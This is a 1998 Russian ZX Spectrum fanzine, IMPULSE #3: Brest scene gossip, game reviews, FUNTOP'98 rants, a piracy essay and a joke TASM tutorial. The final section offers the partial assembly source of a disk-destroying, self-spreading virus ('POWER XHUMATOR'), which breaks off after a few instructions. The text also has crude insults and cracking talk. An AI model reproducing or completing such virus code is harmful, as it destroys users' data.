Здарова человек, вот и вышел, наконец, третий номер IMPULSE. Возможно для тебя он покажеться слишком откровенным и неприятным, ну что же - твои проблемы, лучше горькая правда, чем сладкая ложь (а еще лучше сладкая правда:). Тебя возможно удивит перемена газеты, ведь IMPULSE 1&2 были такими безвредными и примитивными, занимали свою вонючую нишу среди однообразных газетенок. Уже видна положительная тендеция в газетостроении - начали выходить различные BUH'енвальды, TOP'ы и т.д. (хотя, как начали,так и кончили).
К вопросу об IMPULSE, мы выпустил этот номер для того, чтобы окончательно расставить
все точки над "i". Наше мнение независимо и не может быть изменено путем физического
насилия, или других методов воздействия. Да и вообще,чего это мы тут про разборки
разговорились.Фиг с ними, мы их не боимся,не боимся и разных факов в 'газетенках',а
также в хамских мессагах и звонках по телефону. Да,мы думаем,что все то, о чем
мы здесь написали, ни для кого уже не секрет, и все уже давно об этом знают,
ну может за исключением некоторых уебанов. В этом выпуске мы расскажем о проблеме
пиратства и о том, что мы думаем по поводу нелегального распространения "Черного
Ворона" в Беларуси.Расскажем и об оценке выпущенного в 1998 году программного
обеспечения, и еще о многом другом. Ладно, затянули немного мы со вступлением,
пора начинать.
Сегодня в номере:
БРЕСТСКИЕ НОВОСТИ: КТО ЧЕМ ЖИВЕТ И КТО ЧЕМ ДЫШИТ
-=POWER ULTRA HACKERS ALLIANCE=-
DELTA/PHG: Прикупил себе 3'5 драйв. Извратил (в
лучшую сторону) TARGET: RENEGADE, я вставил туда программный эмулятор (последней
версии) MATROX MILENIUM гейма стала работать вполне профессионально (особенно
с турбо-режимом). Перевел на TR-DOS SPECTRUM EXPERT #02. Немного покопался в
интерфейсе IMPULSE (вставил мышку), а также принимал активное участие в создании
этого номера. Но в основном морально готовлюсь к войсковой части 5526, к которой
я приговорен 11 декабря 1998 года :(
IMPERIO/PHG: Написал 4K INTRO на CHAOS, но после
просмотра GOA очень сильно проблевался и решил не выставлять свою работу, тем
более, что в связи с кризисом в России PARTY не проводилось. Написал интруху
для TARGET RENEGADE, а также принимает активное участие в подготовке этого номера.
Недавно обзавелся 5'25 дисководом на 1. 44, который работает только с половиной
диска и теперь планирует написать демо на FUNTOP'99.
Уже успел прославиться в институте - за "некоторые проделки его выкинули из
поинтов в политехе, хотя через некоторое время у него снова появился адрес,
но уже на другом сервере.
JAGURA/PHG: Стал обычным PC-шным ламером, ничего
не делает, ничего не пишет, на эмулятор хер положил уже давно.
REAL SOFTWARE CREATIVE POSSE
REAL/RS:
Прикупил себе PENTIUM IBM 200+ модем + 5'25 дисковод + все остальное. Со спектрума
уходить не собираеться и даже выпустил очередной номер ECHO. Устроился на гос.
работу и получает в среднем от 200$. По понятным причинам ее не называет.
Недавно выпустил бета-версию SGEN v5.0, пишет очередную версию (1.7) REAL COMMANDER'а.
CYBEREX/RS:
Продолжал писать текстовый редактор, но из-за собственной халатности посадил
себе SPECCY - вроде два камня уже спалил. Редактор еще не закончен.
SCOOPTER/RS:
Распродает по низкой цене свою технику и ждет часа купить себе INTEL PENTIUM-II
300. Деньги уже есть, но он решил подождать,когда упадут цены.
Устроился на работу в коммерческую фирму, зарплату не разглашает.
DARKMAX/RS:
Не проявляет своего существования.
Группировка REAL QUALITY SOFTWARE планирует выпустить
к Новому Году пакет программ под названием: "THE REAL SOFT COLLECTION",в который
войдут все последние версии программ, улучшенный TECHNODROM. Но по заявлению
скептиков этот проект не сможет выйти раньше марта 1999 года по чисто техническим
причинам. Пакет будет защищен новой, оригинальной защитой, которую еще никто
не реализовал на спектруме. По степени сложности она уже давно опередила защиту
на ЧЕРНОМ ВОРОНЕ. Проект будет коммерческим, хотя я не совсем ясно себе представляю,
кто будет пользоваться защищенными системными программами. Время покажет, остается
только ждать.
+ NEW + heRACKERS GROUPa +
MR.HEDGEHOG/NHG:
Поступил
в Политех на архитектора, прикупил себе INTEL PENTIUM
200MMX.В данное время фанатеет от DUKE'а и поливает дерьмом SPECCY. Подарил
IMPERIO
16 дисков (хоть за это спасибо).
MUZAFAR/NHG:
Недавно
забил на одну вещь - бестолковое пинание мячика. Возможно его, как высокопрофессионального
футболиста, не устраивали те 30$, которые ему платила ассоциация белорусского
футбола? Сейчас играется у HEDGEHOGа на его писюке. По заявлению некторорых
официальных лиц, цитирую : "в футболе он труп, просто у его"
папаши в этих кругах есть некоторые связи", конец цитаты.
Владик/NHG:
Стал узлом FIDO, но в целом остался таким-же как и был. Зажал IMPERIO страшный
вирус.
BANGO/NHG:
Купил себе писюк на CYREX'е.
BOGDANCHOOK/NHG:
Дослуживает в ментах.
NASHWILL/NHG:
вернулся из армии(связь), но похоже в процессе службы из его головы
(точнее фанеры:) выбили все его способности. За 5 месяцев он ни сделал ничего,
зато
поломал себе монитор, спалил ИР23 и РУ5. Купил себе кинескоп для монитора, корпорация
PHG отреставрировала ему спекки, но на данный момент у него нет ни дисковода,
ни контроллера.
Устроился на работу программистом на мебельной фабрике.
RESON/NHG:
Вернулся из армии (связь) вместе с NASHVILL'ом. Активно пытается столкнуть свою
AMIG'у RULEZ :)...
INKOGNITO SOFTWARE
Недавно встретил Бульбяша. Он обещал выпустить MONSTER 4 к Новому Году (в подарок
под елку). Также грозился кинуть COMING SOON в IMPULSE.
ОБЗОР ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ
MONSTERLAND (C) RAGE
Вот и минская группа RAGE "порадовала" нас, наконец, полной
версией широко разрекламированной игры под названием MONSTERLAND. Не стану кривить
душой и говорить о том что этот продукт я ждал, так как он не понравился мне
еще по демоверсии. Но честно говоря, я надеялся увидеть лучшее. Тем более, что
обычно в демоверсиях на спектруме есть мало чего общего с игрой. Так было и
с технодромом - если посмотреть на демоверсию, то можно солидно проблеваться,
а полная версия игры намного лучше.
В MONSTERLAND'е все идентично, каких-либо принципиальных отличий от демоверсии
я не нашел. Игра отличается множеством драных и перерисованных спрайтов. Дизайн
игры тоже "драный", в частности из LASERSQUAD'а и STALKER'а.
Лицензионная копия стоит около 1$ за диск,т.е. цена не слишком высокая, но и
не низкая. Диск поцарапан в стиле Медноногова. REAL/RS, как самый активный борец
за поддержку авторов, взял пару пакетов по оптовой цене, но,по видимому, продать
их в Бресте будет затруднительно как минимум по двум причинам. Первая: в Брест
пришла ломаная версия в 900 секторов без защиты (MAYHEM) (правда не работающая
на 5.04 (Брест), на моем-же спекки все O.K.), а вторая причина-это глючность
авторской копии!!! Посередине игры выдаеться надпись: у вас ломаная версия и
т.д и т.п.
В общем, гейма неприятная, и выставлять ее на продажу не стоило, а то стыдно
за Беларусь...
HEADBALL (C) ZX-MASTERS
Демоверсия этой игрушки появилась в 7 номере ZX-FORMAT'а,
полная версия не замедлила появиться (CRACKED by MAYHEM). Физически она занимает
около 400-500 секторов и, естественно, без поддержки GENERAL SOUND, хотя в авторской
версии поддержка была. Я не упрекаю MAYHEM за обрезаниe: правильно сделали -
кому нужна поддержка под эту "дохлую" карточку, которая благодаря жадности и
непрофессиональному подходу производителей и продюсеров этого проекта так и
осталась лишь питерским стандартом.
Ну ладно, вернемся к самой игре.В целом впечатление приятное и критики в адрес
авторов нет почти никакой. Разве что несколько игровых фонов игры подло содранны
из Target Renegade и др. игрушек. Все сделано красиво, играбельно и приятно.
Бегство на Хархан (C) AIR
Очередная диззи-образная гейма, ломаная версия by MAYHEM.
Ничем примечательным гейма не отличается кое-какая графика "драная", своя довольно
корявая. Сюжет типичен для подобных игрушек-однодневок, поэтому и обсуждать
его нет смысла.
LAST HERO OF THE LIGHT FORCES (C) EXCESS
Полная версия игры, которая вышла спустя два года после
выпуска демоверсии. Гейма сломана ужасным ламером, жаль этот дятел координат
не оставил. Руки бы ему за эту пакость поодбивать - после него эта работа под
все 100% подходит под термин: глючная пиратская версия. Но мне все-же удалось
протестировать ее.
Гейма
полный калл и отстой! Такое чувство, что ее делали какие-то маленькие дети.
Она полна всякими плоскими шуточками, от которых через некоторое время начинает
слегка подташнивать. Сразу-же, не углубляясь в игру, можно найти неточности
и разрывы в сюжетной линии. Возьмем к примеру выбор игроков : сканированные
и разукрашенные лица игроков, среди них попадаються такие личности как мент,
председатель колхоза и т. д. Есть и две девки.
Если выбрать игру девкой, то баба, которая что-то втирает попозже, произносит
тот-же текст, который она произносит перед мужиком. Можно посмотреть и морды
авторов, вроде не слишком детские, а такую чушь написали. Кстати,во время просмотра
физиономий авторов играет паршивая музыка. В общем, гейму делала толпа, а получилось
как обычно полная херня.
DEJA VU #06 (C) PLAYGEAR
Очередной номер популярного журнала. В целом этот номер,
как и предыдущие, получился неплохим. Интруха немного хуже чем в 5'ом выпуске,
немного поменялся интерфейс, из-за чего он стал малость тормозить. Отчет по
FUNTOP'у на первый взгляд получился обьемным, хотя после детального исследования
выяснилось,что информации по PARTY маловато, да и Вован Булчукей был назван
Балчукеем. Сканированные картинки, обработанные в графическом редакторе, потеряли
заметное сходство с оригиналом.
В приложении две лучшии 4K INTR'ы, среди которых и хит сезона GOA by EXPLODER.
Также там присутствует демо версия извращалки картинок,по сути практически ни
в чем не уступающая полной версии (за иск лючением нескольких мелких функций),но
уже со
100% гарантией можно сказать, что она обогнала демо-версию извращалки картинок
от PHD, хотя ценность этих программ для художников со стажем на спектруме под
большим вопросом.
Журнал, повторяю, неплохой, но ему еще далеко до уровня SPECTROFON, ZXF, SPECCY
EXPERT.
SPECTRUM EXPERT #2 (C) X-TRADE
Вот и вышел очередной номер SPECTRUM EXPERT'а. Авторская
версия пришла ко мне на нестандартном диске, а также с музыкой во время загрузки.
Журнал пришлось немного поломать и перевести на TR-DOS диск с #3D13 LOADER'ом
(старая версия не работала ни на каком из брестских контроллеров, у меня, как
обычно, все OK). Информация подобрана тщательно, профессионально и стильно.
Ничего плохого про сам журнал сказать не могу, разве что про приложение.
В приложении геймы: CAPTAIN PLANET и еще какая-то демоверсия, а также язык си.
Интруха в журнале просто обалденная, правда немного подтормаживает на "байтах",
но на моем турбированном все, как обычно, OK :)
OPERATION RED REFRIGERATOR (C) GALAXY
Несколько необычное название. Это вторая диззи-образная игра, выпущенная группой
GALAXY, их первой геймой были 48 утюгов. Тем не менее авторы этой игры не принимали
никакого участия в предыдущем проекте. Эта гейма отличается от других гейм этого
типа высоким уровнем кодинга и очень качественной графикой. Насчет музыки также
ничего плохого сказать не могу - музыка приятная. Гейма работает в одно прерывание,
т.е. 50 кадров в секунду, и при этом она ухитряеться не тормозить на обычных
"байтах". Сюжет игры несколько запутан и нелогичен, так что пройти без описания
эту гейму довольно трудно, тем более, что какой-то чувак пораскидывал по всяким
журналам и газетам описание, а люди, как известно, очень нетерпеливы. Всем настоятельно
советую не читать HELP, а пройти ее самому - так гораздо интереснее. Всего есть
две комнаты, в каждой имеется возможность выбрать одну из 4'х музыкальных композиций.
РАЗМЫШЛЕНИЯ
ПО ПОВОДУ FUNTOP'98
(C) IMPERIO
Не так давно в Москве проводилась пати FUNTOP'98, которая
должна была стать альтернативой умершему Инлайту и дать возможность народу потусоваться,
завести знакомых и, естественно, свои работы показать и других посмотреть. Немало
спектрумовских журналов и газет опубликовали свои отзывы по поводу ФАНТОПа и
фантоповских работ, но ни в одном из них я так и не увидел всей правды.
Вы, конечно, скажете: "Парень, ты не был на ФАНТОПе и не тебе рассуждать о нем".
Да, возможно это так, но... имея статус MAIN, как ни как, интромейкера и демомейкера
;-) города Бреста, а также каплю разума и здоровой критики, я не могу не расставить
последние точки на "i" и не дать свою оценку качеству работ этой пати. А эта
оценка, поверьте, не так уж и высока.
Итак, что мы имеем. Сначала проведем оценку MUSIC compo. Я не знаю, как назвать
услышанное мною - такого дерьма я не слышал нигде! После прослушивания 5ти произведений,
которых даже бредом назвать нельзя, моим ушам стало плохеть и мой желудок стал
рваться наружу. Но тем не менее, приняв "для души", я пересилил отвращение и
дослушал все "прекрасные мелодии" до конца. У меня сложилось такое впечатление,
что авторам этих музаков поотрывали руки и уши, и они носом долбали клаву,пытаясь
создать свои "шедевры". Мало того, что практически ни одна музачка не имеет
даже элементарно красивой мелодии - в ней глючно все: от сэмплов и до аранжировки.
Любая из муз того же
Инлайта'96 могла бы с успехом утопить в дерьме все музы ФАНТОПа. А что говорить
об
97ом Инлайте - он вообще бьет ФАНТОП в MUSIC compo наповал. Да, а 1 место вообще
отвальный музак занял - такую чушь я, наверное, года уже два не слышал. Конечно,
и раньше люди писали музы, от которых вяли уши и сохли все внешние и внутренние
органы, но чтобы все музыканты сразу стали такими людьми.
И если подводить черту под всем сказанным по поводу MUSIC compo, то можно сказать
следующее: нам не нужна такая музыка, мы не хотим слушать музыку с таких compo,
на которые лишь единицы могут выставить прекрасный саундтрэк (да, 1-3 музы мне
действительно понравились, я даже протащился)!
* * *
Что касается GFX compo, то... Народ, это такое же дерьмо, как и MUSIC compo!
Неужели и 90%ам художников поотрывали руки и повырывали глаза?! Почти все из
скринов лишь отдаленно напоминают среднего уровня картинку, а некоторые из них
даже на говнючий абстракционизм не похожи. Особенно меня прикололи темы некоторых
картинок: какие-то кристаллы, которые лежат в какой-то зеленой траве (Ivan "Roshin);
какая-то баба, которая берет в рот 2 члена (Power Group/Витебск).Кстати, детки,
советик вам один: меняйте свою
назву, а то... не надо портить своими галимыми работами имя POWER HACKZ ALLIANCE,
то бишь нас. Вы когда себе назву придумывали, хотя бы поинтересовались, а не
заюзана ли она! Тем более, что вы на этой сцене еще малыши! Короче, по-хорошему
поменяйте свою назву!). Ладно, я немного отвлекся. Были,конечно,и красивые работы
- EXTREMLY?, апример! Но опять же - единицы из массы всего дерьмеца.
* * *
4K-INTRO compo. Ну... GOA - это вечный кайф, от которого можно протащиться бесконечное
кол-во раз! Я такого и не ожидал увидеть. Ну DIZZY можно еще посмотреть, но
желательно на пустой желудок. А остальные интры - гача, лажа и всякое такое.
Нельзя, в принципе, судить
слишком строго, ведь это всего лишь 4K, но после просмотра GOA ;-) Ну скажите,
народ,
не стыдно ли выставлять в 98 (!) году влепленную в 4K аттрибутную плазму (как
отличился Ivan Roshin) или писать интро с охеренным декранчем, чтобы народ посмотрел
на какой-то галимый шахматный туннель, да еще и без музыки.
Я не могу сравнивать это compo с чем-нибудь, т.к. это, как говорится, впервые,
но хорошее впечатление у меня оставила только работа EXPLODERа.
* * *
И, наконец, DEMO compo... Давайте заглянем в прошлое, в те времена,когда был
Инлайт'96. Уже тогда казалось, что демомейкинг дошел до точки своего кипения,
но через год был Инлайт'97... уровень демо-работ которого просто поразил всю
сцену (в хорошем смысле этого слова). И вот казалось бы, в 98 году демомейкинг
поднимется до тааакого уровня... Хрен там! Я сразу отброшу те несколько дем,
авторы которых, на мой взгляд, не заслуживают
плохих слов в свой адрес. Это - FOREVER, REFRESH и BLAME. Хотя даже тот же REFRESH
имеет свои минусы - практически полностью текстурный и монохромный; все части
работают не в INT и не в два, а хрен знает во сколько, что снижает удовольствие
от восприятия; анимация, которая работает хрен знает на каких машинах; полное
отсутсвие какой-либо линии развития действий. М-да, все остальные работы, которые
принимали участие в compo - корявизна и ужас! Хотя бы потому, что везде, во
всех демах насовано
глючно-квадратной текстуры. Приятнее, конечно, смотреть демо с текстурной плазмой,
чем с аттрибутной, но не надо же делать текстуру квадратной. Да и уровень кодинга
тянет год этак на 95!
Кому нахрен нужны такие демы! Как жаль, что со сцены ушли такие люди, как IMP/DMS,
которые действительно творили шедевры своего искусства. Как жаль, что в ФАНТОПе
не принимали участия PROGRESS. А забугорный INSANE by 3SC - да он по одному
стилю только обгонит все демы с ФАНТОПа! Главное в деме не крутость, главное
- красота и стиль, которых всем так не хватает...
* * *
Да, зато как отзывался об ФАНТОПе один из его орган(айзеров) - Вова Булчукей.
Он так восхищался уровнем работ, он чуть ли не кричал в своем NICRONе о том,
что Инлайту до ФАНТОПа, как... Хммм, у меня свое мнение и я считаю, что большинство
людей, оставшихся в стороне от пати, меня поддержит. Не надо быть обманутым
теми, кто сам обманут!
Я лишь надеюсь, что все те, кто собирается принять участие в FUNTOP'99, учтут
все то, что я так старательно здесь втирал. И тогда... Инлайту и в самом деле
будет до ФАНТОПа, как...
DELTA> Я считаю, что IMPERIO не прав. Он не имеет никакого права так ужасно
охаивать чужие демки, хоть он себя и считает "MAIN интромейкером Бреста". От
себя хочу помянуть недобрым словом вОвАнА былЧУКэйКУ, который в ужасной форме
незаслуженно оскорбил меня, заявив что не пустит "членов творческой IMPERIO'вской
группировки" на fUCK tOP! Мне, конечно, и в голову не приходило переться в далекую
Москву. Я хочу сказать тебе вОва : "Члены POWER HACKERZ GROUP не отвечают за
действия друг друга, также как и ты не отвечаешь за действия участников FUCK
TOP. Я не защищаю IMPERIO, я защищаю справедливость, о которой ты, удод, наверное
никогда и не слышал. Кстати,многие ламеры кинулись наезжать на IMPERIO. Вот
например - ARS/FTL очень долго и упорно сплетничал вместе с OLDMAN'ом на тему
"блин, жаль, что Брест далеко, а то бы мы подъехали и начистили морду IMPERIO".
И через неделю ARS действительно приехал в Брест. Более того, он даже бухал
вместе с IMPERIO. И почему это он не сказал это IMPERIO в лицо ? Ведь он у нас
такой крутой чувак. После того, как ARS уехал в Минск, через некоторое время
приходит базар в эхе ARS'а и OLDMAN'а. Если бы этот разговор произошел до приезда
ARS'а, то получал бы по репе не IMPERIO, а ARS (за козла).
ПИРАТЫ ОТБИРАЮТ ПОСЛЕДНИЕ
БАБКИ У МедноНогова!
(C) DELTA
Вот и вышлa, наконец, полная версия самого глобальнго, самого крупного, самого
крутого релиза 1997/1998 года. Несомненно, это - "Черный Ворон". Эта та гейма,
о которой так много говорили все кому не лень, многочисленные издания постоянно
публиковали интервью с автором, а также обозрения демо-версий. Множественные
демо-версии (а их насчиталось аж 5 штук) только усиливали ажиотаж вокруг данного
продукта.
И вот наконец он вышел, полная версия. Естественно, она была непроходима :)
Потом вышла еще одна, как дела обстояли дальше я не знаю, т.к. нахожусь на довольно
солидном расстоянии от Питера и не мог знать событий,которые там происходили.
Ну вот, наконец, Ч8 пришел в наш город. Осмотрев это я хочу упрекнуть а Медноногова
как минимум за два пункта. Это :
1. Нахождение вектора прерываний и программного кода программы в SLOW-RAM, из-за
чего на "БАЙТЕ" сама игра неимоверно тормозит.
2. При чтении/записи с диска вектор прерываний находится в SLOW-RAM, из-за чего
на "БАЙТЕ"" происходит аппаратный сбой контроллера и лицензионная версия не
работает на двуполевых тачках.
Ужас, да и еще, как пишет Mythos, Медноногов считает, что SCORPION - это двуполевая
машина ! И это говорит человек, которого считают самым лучшим программистом
на SPECCY.
Свои ошибки он повторяет в третий раз - он думает, что его защита со стеком
в экранной области решит всю проблему с нелегальным копированием. Возможо, она
и решит проблему MAGIC (хотя и не на 100%! Бывает все-же, MAGIC фурычит), но
профессиональному хакеру, который имеет даже голый 128 Speccy, на все эти защиты
грубо говоря - накакать, это только вопрос времени. Зачем, спрашивается, так
тормозить?
Все уверены, что в Бресте эта игра распространялась бы более цивилизованными
методами, если бы она работала так, как надо. А ставить кнопку так называемой
блокировки ULA никому не хочется. Вот лично ты получил бы удовольствие, если
бы перед каждым обращением к диску тебе пришлось бы нажимать на кнопку ? Я написал
слово "блокировка" в кавычках именно из-за этот девайс уважает зависать и всячески
тупить. Вот лично у меня таких программ нет, в которых бы вектор I стоял бы
в неположеном месте, нет и не будет, и потребности в такой кнопке у меня нет...
Я лучше исправлю программно, чем аппаратно. Да, я согласен, что это довольно
грубый наезд, грубый, но обоснованный. Работа действительно была проделана крупная.
Взять бы даже QVGA цветные картинки, а также мультяшки и два FINAL CUT'а, сделанных
в 3D STUDIO MAX.
Ну, не буду я описывать здесь эту гейму, наверняка каждый ее уже видел. Я хочу
рассказать вам историю ЧВ в Бресте и в Беларуси.
В Бресте над взломом этой игры работал довольно молодой хакер из группы REAL
SOFTWARE HACKERS CREW. Потом она была выпущена к распространению, и Медноногов
поимел с Бреста всего 3 багса. Причем на эти три багса скидывалась чуть ли не
половина
Бреста:). Первая версия была взломана довольно коряво - вместе с куском защиты
был удален кусок ИИ, из-за этого глюка компьютер лишился возможности производить
юнитов и, конечно, игру все прошли в среднем за 10 часов. Тогда еще многие удивлялись,
как это в Минске народ тупит и сидит над легкими уровнями по целым дням. В той
версии еще не глушился дисковод после сохранения / загрузки следующего уровня.
И вот через неделю
вышла вторая версия: там уже был нормальный ИИ, но только дисковод вообще перестал
глушиться и после прохождения очередного уровня следующий уровень грузился и
зависал.
После
этого мне попадает в руки апдейт, своеобразный патч предыдущих версий, там он,
немного повозившись с первым диском, сохраняет все что нужно. Как следствие,
все это дело у меня тоже не работает- в некоторых уровнях появляются глюки,
из-за которых игра не
проходится. По-видимому, хакер нечаянно задел защиту, которая не замедлила себя
проявить.
Вот что значит - покупать глючные пиратские копии! От себя хочу еще добавить
что за ЧВ я не получил ни копейки. Хотя реально мог получить за нее деньги,
просто мне не хотелось копаться в дерьме, но кто-то должен был это сделать,
ведь если бы этого не было, народ не дождался бы полной версии этой замечательной
игры. Правда я очень возмущен ценой пиратской версии, она составляла 140 штук
зайцев или около 2.7 багса. Каждый день юзеры бегали к этим ребятам менять глючные
копии (на более глючные).
Вот так Сяву Медноногова "взяли за яйца" в Бресте.
P.S.
Кто знает, что бы было если бы он удосужился грамотно проставить 10-20 байт...
ПУСТЫМ КОФЭЙНИКАМ
И ЗАПОЛНЕННЫМ ЧАЙНИКАМ
(C) IMPERIO
Приветствую Вас, народец. Раздела ПРОГРАММИСТАМ Вы больше не увидите - с сегодняшнего
дня этот раздел подразделился на два оных. Первый из них называется
"ПУСТЫМ КОФЭЙНИКАМ", а второй - "ЗАПОЛНЕННЫМ ЧАЙНИКАМ"! Я не буду косить
под разные там "журнальчики" и "бульварные газетенки" и публиковать
всевозможные процы очисток экранов, вывода летающих и блуждающих спрайтов -
это так примитивно и не современно.
Из
этого номера IMPULSа вы узнаете :
ПУСТЫМ КОФЭЙНИКАМ
I. Как загрузить ассемблер TASMvX.XX и подготовить его
к работе.
Ассемблер TASM представляет собой многофункциональную систему для редактирования
ассемблерных текстов, их компиляции и запуска. Как и запуск любой другой такой
системы, запуск TASMа представляет собой большое кол-во последовательно выполняемых
операций.
1. Сначала нажмите RESET на Вашем компьютере, дабы привести его в состояние,
способное воспринимать Ваши дальнейшие действия.
2. Всеми усилиями добейтесь выхода в ОС TR-DOS, т.к. не имеет смысла лоадить
TASM с ленты.
3. После успешного выхода и появления на дисплее подсказки "A>" сделайте глубокий
вдох и выдох, дабы внутренне настроиться на дальнейшую работу.
4. Аккуратно, не тыкая жирными пальцами мимо необходимых кнопок, наберите "RUN
TASM?" (где ? - это версия TASMа, запускаемая Вами в настоящий момент) и мягко
ударьте по кнопке с загадочной надписью ENTER. В случае отсутствия такого девайса,
нажмите на что-нибудь Вам не известное.
5. При успешном выполнении пп. 1-4, ассемблер TASM переходит на стадию самозагрузки,
длительность которой - приблизительно 2-5 секунд, в зависимости от настроения
лоадера.
6. После появления пригласительного текста необходимо надавить на any key и
насладиться собственным талантом и природным умом, способным на такие сложнейшие
операции.
II. Как нажатием нескольких клавиш перейти из TASMа в
STSvX.XX, не используя при этом WINDу.
В профессиональный комплект сместе с TASMом входит так называемый дебаггер STS,
который предназначен для совместного использования и синхронизирован с работой
TASMа. В процессе работы Вам не один раз придется использовать STS по его прямому
назначению, и я думаю, не лишним будет научиться производить выход TASM->STS
и
STS->TASM.
1. Чтобы произвести выход TASM->STS, необходимо из главного меню TASMа нажать
кнопку "Q".
2. Если мир прекрасен, то выход произойдет успешно и Вы смените среду работы,
что необходимо отметить n-ным кол-вом водочки или другого продукта соответствующей
крепости. В противном случае Вы либо зависните где-то под потолком, либо придется
поднапрячь мозговые извилины и ответить на вопрос "Save work file (Y/N)?" плавным
нажатием соответсвующей кнопочки в зависимости от Вашего желания.
После того, как Вы порулились (или не порулились) в STS: поездили инвертированной
полоской, понажимали на всевозможные баттоны, у Вас есть возможность вернуться
в среду обитания TASM с помощью следующего способа:
1. Нажмите средним пальцем левой руки кнопку "Q".
2. В появившемся меню с помощью комбинаций кнопок CS+6 и CS+7 (где CS - это
сокращенное название кнопки CAPS SHIFT) инвертированной полоской наведите на
пункт "QUIT TO ASM".
3. Мизинцем правой руки нажмите на ENTER (см.I.4) для подтверждения задуманной
Вами операции.
В результате всех этих действий Вы опять вернетесь в TASM и можете продолжать
писать Ваш глобальный проект.
III. Как вкл/выкл BEEPER в TASMе.
Так
уж повелось, что есть люди, которые не признают компьютерного звука. Одни считают
его слишком примитвным для наслаждения им своих слуховых органов. Другим компьютерные
звуки,как и звуки окружающего их мира, нарушают их творческий процесс.
Третьи воспринимают звуки в совсем иной частоте из-за сильных повреждений своих
барабанных перепонок, что, естественно, сказывается на качестве восприятия,
и соответственно, на уровне удовлетворения.
Авторы TASMа пошли навстречу всем тем, кто по каким-либо причинам не переносит
низкочастотный звук BEEPERа, раздающийся при нажатии на какую-нибудь кнопку.
Был
предусмотрен такой вариант, как ОТКЛЮЧЕНИЕ звука и его обратное ВКЛЮЧЕНИЕ.
1. Чтобы ОТКЛЮЧИТЬ звук в TASMе необходимо в главном меню программы сильно стукнуть
по динамику Вашего спектрума, после чего провести тестовую проверку его работоспособности.
2. При успешном окончании теста продолжить работу, в противном случае в том
же главном меню ласково нажать на кнопочку "B" для отключения BEEPERа малоиспользуемым
программным путем.
Чтобы ВКЛЮЧИТЬ звуковое споровождение для ласки Ваших слуховых органов, просто
необходимо сделать следующее:
1. Если BEEPER был по вполне разумным причинам отключен с помощью профессионального
первого метода,то следует проявить не меньший профессионализм и, взяв отвертку,
паяльник и другие жизненно необходимые члены в правую руку, припаять
и привинтить отломанный динамик на то место,где он находился до того времени,
когда Вы применили по отношению к нему физическое насилие.
В случае успешного припаивания (привинчивания) прекрасный звук вновь будет мягко
ласкать Ваши слуховые и половые органы.
2. В случае отключения BEEPERа малоиспользуемым программным путем, сделайте
действие, обратное выключению, т.е. недокументированным и свободно болтающимся
пальцем слегка ударьте по выше описанной кнопке "B". И прекрасное звуковое сопровождение
TASMа вновь услышано Вашими чувствительными ушами.
IV. Как вызвать встроенный редактор TASMа.
Как уже говорилось выше, TASM - это многофункциональная профессиональная мультизадачная
система. И, естественно, не зная всех ее возможностей и наворотов, нельзя говорить
об умении в ней работать. В этой главе я познакомлю Вас, дорогие ПУСТЫЕ КОФЭЙНИКИ
с тем, как начать работу со встроенным многооконным редактором TASMа. После
прочтения этой главы Вы уже не будете ПУСТЫМИ КОФЭЙНИКАМИ, Вы сделаете
первый шаг на тяжелом пути эволюции кофэйника в чайник.
1. Чтобы вызвать редактор TASMа, необходимо отправиться на почту, прихватив
с собой трошку сала.
2. Оформив сало ценной бандеролью, необходимо отослать его креатору TASMа.
3. Приблизительно через месяц-после того, как сало дойдет до места назначения
и будет дегустировано народом, необходимо подойти к телефону и позвонить туда,
куда Вы выслали сало.
4. Пьяный и заикающийся голоса сообщат Вам о том, что в их продукте предусмотрена
такая кнопка, как "E", которую если нажать, то будет то, чего Вам нужно.
5. Повесив трубку, загрузите TASM (см.I).
6. В главном меню, поищите на клаве эту самую кнопку "E" в течении 1.25 минуты,
после чего надавите на нее любым пальцем любой руки, чтобы привести ее в рабочее
состояние.
7. На появившееся на дисплее сообщение Edit file: необходимо ответить взмахом
руки начинающего пианиста, после чего с криком ударить по ENTER (см.I.4)
После успешного завершения всех этих операций Вам будет предоставлена возможность
насладиться прелестным бегающим курсором, великолепным вертикальным скроллин-
гом экрана и еще многими мелочами, которые так радуют душу и теребят сердце.
Ну вот и все на этот раз, дорогие ПУСТЫЕ КОФЭЙНИКИ. Читайте предоставленный
Вам
материал, перечитывайте, разбирайтесь. И... ждите следующего номера IMPULSE
- в нем я продолжу учить Вас самому простому и элементарному, продолжу наставлять
Вас, дабы Вы ступили на следующую ступень иерархической лестницы нашего общества
- стали КОФЭВАРКАМИ.
ЗАПОЛНЕННЫМ ЧАЙНИКАМ
V. Как сделать реальный вирус на спектруме (из неразгаданных
тайн процессора Z-80)
Такого на спектруме еще не было! Народ, предлагаю Вашему вниманию исходник глобальной
разработки - вируса под названием POWER XHUMATOR версии 4.1. Первоначально сей
вирус занимал #A3 байта и писался вот так, от балды. Но мне понравилась идея
и я оптимизировал код вируса до #8A байт и написал даже инсталляшку. Что он
творит? А творит он самое подлое - гадит 0 трек на Ваших драгоценных дисках,
и что еще подлее, так это то, что XHUM гадит 0 трек еще и на Ваших рабочих дисках.
XHUM встраивается в BASIC-лоадеры всевозможных прог, не превышающие #XX72 байт
и ждет своего часа.
Мало того, что вирус способен самораспространяться; файлы, содержащие вирус
inside, могут подвергаться любому насилию, такому как копирование, уплотнение,
транспортировка по почте и.т.д. Конечно, не гарантирована работоспособность
вируса со 100% файлов, но, извините меня, это всетаки всего лишь #8A байт.
Я не буду вдаваться в принцип работы ниже приведен исходник, и те, кому это
интересно, разберутся во всем сами. А для тупорылых ребят я оставил тупорылые
комментарии, которые помогут им постичь неизведанное.
;-----------------------------------------------------
; POWER XHUMATOR v4.1"
; Special Edition For ZX-NET"
; Koded & Optimized By"
; !mPeR!0/P0WER HaCkZ All!aNcE"
;-----------------------------------------------------
DELTA>Sorry за мрачный вид, не было никакого желание приводить этот бред в нормальный вид... Разбирайтесь :)
LEN EQU #8A
ORG #8000
RST #38 ;SP-2>SP, PC>(SP)" ;#38>PC"
EXX ;BC<>BC', DE<>DE'" ;HL<>HL'"
DEC SP ;SP-1>SP
DEC SP ;SP-1>SP
POP AF ;(SP)>AF, SP+2>SP"
EX AF,AF' ;AF<>AF
LD HL,#C9F1 ;#C9F1>HL
LD (#5CC2),HL ;HL>(#5CC2)
LD DE,#0000 ;#0000>DE
LD BC,#0905 ;#0905>BC
PUSH HL ;SP-2>SP, HL>(SP)
PUSH HL ;SP-2>SP, HL>(SP)
CALL #3D13 ;SP-2>SP, PC>(SP) ;#3D13>PC
EX (SP),HL ;(SP)<>HL
